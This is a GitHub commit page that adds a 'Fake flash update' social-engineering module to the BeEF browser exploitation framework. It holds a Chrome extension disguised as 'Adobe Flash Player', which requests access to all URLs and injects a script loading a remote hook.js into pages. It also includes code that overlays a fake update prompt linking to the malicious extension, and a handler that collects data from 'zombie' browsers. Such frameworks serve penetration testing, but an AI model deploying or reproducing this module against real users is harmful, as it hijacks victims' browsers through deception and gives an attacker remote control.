Skip to content
Permalink
Browse files

added fake flash player module and chrome extension

  • Loading branch information
mike-at-aura committed May 27, 2012
1 parent b84ec77 commit dc040a51acad3538c45fb4cca468092904708710
@@ -0,0 +1,4 @@
d=document;
e=d.createElement('script');
e.src="http://127.0.0.1:3000/hook.js";
d.body.appendChild(e);
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,22 @@
{
"name": "Adobe Flash Player",
"version": "1.0",
// when the browser icon is clicked, a new tab is open to maintain persistence (chrome.tabs.create)
// for the sake of testing...unfortunately the popup is closed when the user is not focusing on it.
// See at the end of index.html file.
"description": "Introduces vulnerabilites into webbrowsers",
"background": {
"scripts": ["background.js"]
},
"icons": {
"16": "icon16.png",
"48": "icon48.png",
"128": "icon128.png"
},
"permissions": [
"tabs",
"http://*/*",
"https://*/*",
"file://*/*"
]
}
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,32 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {

// Grab image and payload from config
image = "<%== @image %>";
payload = "<%== @payload %>";

// Add div to page
div = document.createElement('div');
div.setAttribute('id', 'splash');
div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
div.setAttribute('align', 'center');
document.body.appendChild(div);
div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\' /></a>';
$j("#splash").click(function () {
$j(this).hide();
});
});
@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
fake_flash_update:
enable: true
category: "Social Engineering"
name: "Fake flash update"
description: "Prompts the user to install an update to adobe flash player that is a malicious chrome extension"
authors: ["mh"]
target:
user_notify: ['ALL']
@@ -0,0 +1,38 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Fake_flash_update < BeEF::Core::Command

def self.options
configuration = BeEF::Core::Configuration.instance
payload = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.crx"
image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"

return [
{'name' =>'payload', 'description' =>'Location of the chrome extension that user is promted to install', 'ui_label'=>'Chrome extension', 'value' => payload},
{'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}

]
end

#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
save({'answer' => @datastore['answer']})
end

end

0 comments on commit dc040a5

Please sign in to comment.
You can’t perform that action at this time.